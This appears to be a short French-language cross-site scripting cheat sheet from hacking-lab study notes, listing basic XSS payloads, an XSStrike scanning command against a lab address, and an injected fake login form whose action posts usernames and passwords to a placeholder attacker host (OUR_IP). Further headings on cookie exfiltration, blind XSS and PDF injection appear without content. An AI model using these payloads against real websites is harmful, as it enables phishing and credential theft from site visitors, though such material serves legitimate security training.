XSS
Cross-Site Scripting (XSS) Cheatsheet
Payloads de Base
<script>alert(window.origin)</script>
<iframe src=file:///flag.txt></iframe>Outils : XssStrike
python xsstrike.py -u 'http://83.136.255.40:49597/?fullname=nhj&username=jhk&password=jl&email=lkl@gmail.com'Formulaire de Connexion Malveillant
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>Exemple en JavaScript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();Serveur de Récupération des Identifiants (PHP)
XSS Aveugle (Blind XSS)
Exfiltration de Cookies
Explication du Vol de Cookies
Exploitation XSS via PDF
Exemple de code injecté dans un PDF
Exfiltration sans IP Publique
Mis à jour